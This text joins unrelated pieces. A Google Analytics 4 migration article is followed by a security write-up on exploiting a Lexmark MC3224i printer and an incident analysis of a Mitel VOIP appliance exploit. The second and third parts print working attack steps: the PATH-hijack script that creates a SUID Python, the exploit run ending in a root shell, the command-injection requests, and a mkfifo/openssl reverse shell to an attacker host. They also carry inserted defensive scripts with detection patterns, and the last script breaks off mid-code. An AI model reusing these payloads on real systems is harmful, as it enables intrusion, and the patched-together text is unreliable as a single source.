Also, you can’t create a filter in GA4. In case your property was converted from UA to GA4, then you can find a read-only list of UA filters under Admin » Account » All Filters.

[Screenshot: read-only UA view filters]

Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your measurement ID and global site tag code snippet. You can also enable enhanced measurements such as your page views, scrolls, and outbound clicks.

[Screenshot: data streams in GA4]

In a data stream, you can do the following:

  • Set up a list of domains for cross-domain tracking
  • Create a set of rules that define internal traffic
  • Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are 2 things that you need to be aware of. First, once you create a data stream, there’s no way to edit it. And if you delete a data stream, you can’t undo this action.

Events vs. Hit Types

UA tracks data by hit types. A hit is essentially an interaction that results in data being sent to Analytics. This includes page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based, meaning every interaction is captured as an event. Page views, events, eCommerce transactions, social interactions, and app views are all captured as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.

[Screenshot: Toggle conversions on in GA4]

This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there’s no option to turn on any setting for tracking events so you don’t need to activate anything here. Google will automatically collect data on these events:

  • first_visit – the first visit to a website or Android instant app
  • session_start – the time when a visitor opens a web page or app
  • user_engagement – when a session lasts longer than 10 seconds or had 1 or more conversions or had 2 or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing and machine-learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.

[Screenshot: enhanced measurement in GA4]

Then you’ll see more enhanced measurement events that include:

  • page_view: a page-load in the browser or a browser history state change
  • click: a click on an outbound link that goes to an external site
  • file_download: a click that triggers a file download
  • scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move on to custom events: if the event you want to track isn’t covered by these 3 event types – automatically collected, enhanced measurement, and recommended – you should create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.

No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier for you to understand, here are the UA metrics and their GA4 equivalents:

  • Custom reports can be found in the Explorations page.
  • Saved reports are automatically created when you run an Exploration.
  • Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time but all new data will flow into GA4. If you have a UA property set up, you’ll see this warning in your dashboard:

[Screenshot: Universal Analytics retirement warning]

So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by-step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.


After setting up GA4, you can go deeper into your data with these guides:

These posts will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source:
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product: Lexmark MC3224
Affected Firmware Versions (without claim for completeness): CXLBL.075.272 (2021-07-29), CXLBL.075.281 (2021-10-14)
Fixed Firmware Version: CXLBL.076.294 (CVE-2021-44735). Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE: CVE-2021-44735 (Shell Command Injection), CVE-2021-44736 (Authentication Reset)
Root Causes: Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact: Unauthenticated Remote Code Execution (RCE) as root
Researchers: Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources:
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
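The fix for this class of bug is to stop re-parsing attacker text with the shell. The following hardened re-implementation of the argument handling is an added example, not Lexmark's firmware code: every field extracted from the POST body is checked against a strict allowlist and handed to the backend as its own argv element via `set --`, so no `eval` is involved. Because the `rob` backend does not exist outside the printer, the function prints the argv it would run, one element per line; the allowlist of destination directories is an assumption made for the example.

```sh
#!/bin/sh
# Hardened argument handling for a sniffcapture-style CGI (added example,
# not Lexmark's code). Fields are validated against allowlists and passed as
# separate argv elements with "set --"; nothing is ever fed to eval.

# Interface names: letters, digits, dot, underscore, dash only.
valid_interface() {
    case $1 in
        "" | *[!A-Za-z0-9_.-]*) return 1 ;;
    esac
    return 0
}

# Capture filters (BPF syntax) may contain spaces, so strip them first and
# then allow only letters, digits and a few punctuation characters. Quotes,
# semicolons, backticks, dollar signs and pipes are therefore rejected.
valid_filter() {
    stripped=$(printf '%s' "$1" | tr -d ' ')
    case $stripped in
        "" | *[!A-Za-z0-9_.:/-]*) return 1 ;;
    esac
    return 0
}

# Destination directories: a fixed allowlist (assumed for this example;
# the original accepted any path).
valid_dest() {
    case $1 in
        /dev/null | /usr/bin | /tmp) return 0 ;;
    esac
    return 1
}

# Extract a "-X value" field from the POST body (same sed approach as the
# original script, written without GNU-only regex extensions).
field() {  # $1 = flag letter, $2 = data
    printf '%s\n' "$2" | sed -n "s|^.*-$1[[:space:]]\([^[:space:]][^[:space:]]*\).*\$|\1|p"
}

# Extract the quoted filter expression that follows -F.
filter_field() {
    printf '%s\n' "$1" | sed -n 's|^.*-F[[:space:]][[:space:]]*\(["]\)\(.*\)\1.*$|\2|p'
}

# Build the backend call for the given POST body. Prints one argv element
# per line; a real CGI would exec the backend with "$@" instead.
# Returns 1 (and prints nothing) when any field fails validation.
build_sniffer_call() {
    data=$1
    interface=$(field i "$data")
    dest=$(field f "$data")
    filter=$(filter_field "$data")
    fmt=""
    set --

    case " $data " in
        *" -r "*) fmt="${fmt}b"; set -- "$@" remove 1 ;;
    esac

    [ -n "$interface" ] || return 1
    valid_interface "$interface" || return 1
    fmt="${fmt}s"; set -- "$@" interface "$interface"

    if [ -n "$filter" ]; then
        valid_filter "$filter" || return 1
        fmt="${fmt}s"; set -- "$@" filter "$filter"
    fi

    valid_dest "$dest" || return 1
    method=startSniffer
    case $dest in
        /dev/null) method=stopSniffer; fmt="${fmt}s"; set -- "$@" dest "$dest" ;;
        /usr/bin)  fmt="${fmt}b"; set -- "$@" auto 1 ;;
        *)         fmt="${fmt}s"; set -- "$@" dest "$dest" ;;
    esac

    # Each element is a separate word; the filter stays one argument even
    # when it contains spaces, and the shell never re-parses it.
    printf '%s\n' rob call system.sniffer "$method" "{$fmt}" "$@"
}
```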

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-selogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect-selogs-wrapper SUID binary again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.
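The script-level mitigation, as an added example that is not Lexmark's code: a logging helper that pins PATH and names its tool by absolute path, next to two checks a reviewer can run against any PATH value: which file a bare command name would resolve to, and which PATH entries are world-writable (the property of /dev/shm that made it usable here). The wrapper binary should additionally hand a scrubbed environment to execve(); that part is not shown. The marker script the demo creates is harmless and constructed for the example.

```sh
#!/bin/sh
# PATH-hijack checks for SUID-launched shell scripts (added example, not
# Lexmark's code). TRUSTED_PATH is the value the hardened script pins.
TRUSTED_PATH=/usr/bin:/bin

# Hardened version of the original logging helper: PATH is reset before
# anything else runs and the tool is named by absolute path, so an
# inherited PATH cannot redirect systemd-cat.
sd_journal_print_hardened() {
    PATH=$TRUSTED_PATH
    export PATH
    /usr/bin/systemd-cat -t collect-selogs echo "$@"
}

# Print the file that command "$1" would resolve to under PATH value "$2".
# Returns 1 if no executable of that name is found.
resolve_in_path() {
    name=$1
    old_ifs=$IFS
    IFS=:
    for dir in $2; do
        [ -n "$dir" ] || continue
        if [ -x "$dir/$name" ] && [ ! -d "$dir/$name" ]; then
            IFS=$old_ifs
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# Print every directory in PATH value "$1" that is world-writable. The 9th
# character of "ls -ld" output is the "other" write bit; -L follows
# symlinks so a /bin -> usr/bin link is judged by its target.
writable_dirs_in_path() {
    old_ifs=$IFS
    IFS=:
    for dir in $1; do
        [ -d "$dir" ] || continue
        if [ "$(ls -ldL "$dir" | cut -c9)" = w ]; then
            printf '%s\n' "$dir"
        fi
    done
    IFS=$old_ifs
}

# Constructed stand-in for an attacker-writable directory: a world-writable
# temp dir holding a harmless script named systemd-cat.
make_shadow_dir() {
    d=$(mktemp -d)
    chmod 1777 "$d"
    printf '#!/bin/sh\necho SHADOWED\n' > "$d/systemd-cat"
    chmod +x "$d/systemd-cat"
    printf '%s\n' "$d"
}

# Demo: the inherited-PATH lookup lands in the shadow directory, the
# pinned lookup does not, and the audit names the offending entry.
demo() {
    shadow=$(make_shadow_dir)
    inherited=$(resolve_in_path systemd-cat "$shadow:$TRUSTED_PATH")
    pinned=$(resolve_in_path systemd-cat "$TRUSTED_PATH" || echo "(not installed)")
    printf 'inherited PATH resolves to: %s\n' "$inherited"
    printf 'pinned PATH resolves to:    %s\n' "$pinned"
    printf 'world-writable PATH entries: %s\n' \
        "$(writable_dirs_in_path "$shadow:$TRUSTED_PATH" | tr '\n' ' ')"
    rm -rf "$shadow"
}
```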

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., the setup wizard has been completed) or is password-less (i.e., the authentication reset was already executed earlier or the setup wizard has not yet been completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.


The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT), this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rm command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile because it was active, resulting in the error message.

Second, the threat actor used the dd command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition from the one storing the HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh. This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -
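Detection logic for this pair of requests, added here as an example and not CrowdStrike's tooling: it walks Combined-format access-log lines and flags a vtest.php get_url that points at the loopback address, and any ucbsync.php syncfile command whose arguments carry shell metacharacters in raw or URL-encoded form. The sample log is constructed from the two requests above (placeholder IPs as in the write-up) plus two benign lines.

```sh
#!/bin/sh
# Access-log triage for the get_url / ucbsync.php exploit chain (added
# example, not CrowdStrike's tooling). Runs on Combined-format lines.

# Constructed sample: the two requests from the write-up (placeholder IPs
# kept as-is) plus two benign requests.
SAMPLE_LOG='1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40
127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -
10.0.0.5 - - [01/Mar/2022:02:00:00 -TZ] "GET /index.php HTTP/1.1" 200 512
10.0.0.6 - - [01/Mar/2022:02:01:00 -TZ] "GET /ucbsync.php?cmd=manifest HTTP/1.0" 200 -'

# Pull the request target out of one log line, lower-cased so that
# percent-encoded hex digits compare regardless of case.
request_target() {
    printf '%s\n' "$1" | sed -n 's/^[^"]*"[A-Z]* \([^ ]*\) HTTP\/[0-9.]*".*$/\1/p' | tr 'A-Z' 'a-z'
}

# Print "<reasons> <client-ip>" for a suspicious line, nothing otherwise.
# Always returns 0 so it can run under set -e inside a read loop.
classify_line() {
    entry=$1
    target=$(request_target "$entry")
    reasons=""
    # (1) vtest.php asked to fetch a loopback URL: the SSRF hop that made
    #     the later request look local to the appliance.
    case $target in
        */vtest.php\?*get_url=http://127.0.0.1*|*/vtest.php\?*get_url=http://localhost*|*/vtest.php\?*get_url=http%3a%2f%2f127.0.0.1*)
            reasons="${reasons}ssrf-to-loopback " ;;
    esac
    # (2) syncfile arguments carrying |, ;, $ or ` (raw or encoded), which
    #     the appliance would hand to a shell through its curl call.
    case $target in
        *ucbsync.php*cmd=syncfile:*)
            case $target in
                *'|'*|*'%7c'*|*';'*|*'%3b'*|*'$'*|*'%24'*|*'`'*|*'%60'*)
                    reasons="${reasons}syncfile-shell-metachar " ;;
            esac ;;
    esac
    if [ -n "$reasons" ]; then
        printf '%s %s\n' "${reasons% }" "${entry%% *}"
    fi
    return 0
}

# Read log lines on stdin and emit one finding per suspicious line.
scan_log() {
    while IFS= read -r line; do
        classify_line "$line"
    done
}

# Convenience wrapper over the constructed sample.
scan_sample() {
    printf '%s\n' "$SAMPLE_LOG" | scan_log
}
```

Run `scan_sample` to see the two write-up requests flagged (the first with both reasons) and the benign lines pass; pipe a real access log into `scan_log` to triage it.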

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

The first outbound request returned valid JSON that the application expected, which allowed execution to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client wraps the connection in SSL/TLS while netcat will typically carry it in plaintext.
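As an added, defender-side example that is not part of CrowdStrike's write-up, the following Python triages the two kinds of evidence quoted above: access-log lines, flagging a get_url parameter that points at loopback (the SSRF hop) and shell metacharacters in the cmd parameter (the injection), and a recovered response body that has the mkfifo reverse-shell shape. The parameter names get_url and cmd are taken from the article; the sample log lines and payload are constructed from the quoted ones, keeping the same placeholder IPs, and the 10.0.0.5 "benign" line is invented for contrast.

```python
"""Triage of the evidence quoted above (added example, not CrowdStrike tooling).

analyze_log_line()            -> finding tags for one common-log-format line
looks_like_fifo_reverse_shell -> True for the mkfifo + sh + openssl/nc shape
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Common log format; \s+ before the quoted request tolerates the double
# space seen in request #2.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3}) (?P<size>\S+)'
)
# Pipes, separators, backticks, $(...) and $VAR have no place in a file name.
SHELL_META_RE = re.compile(r'[|;`]|\$\(|\$[A-Za-z_{]')
# Parameter names from the article: get_url is fetched by the appliance,
# cmd is split and partly handed to curl.
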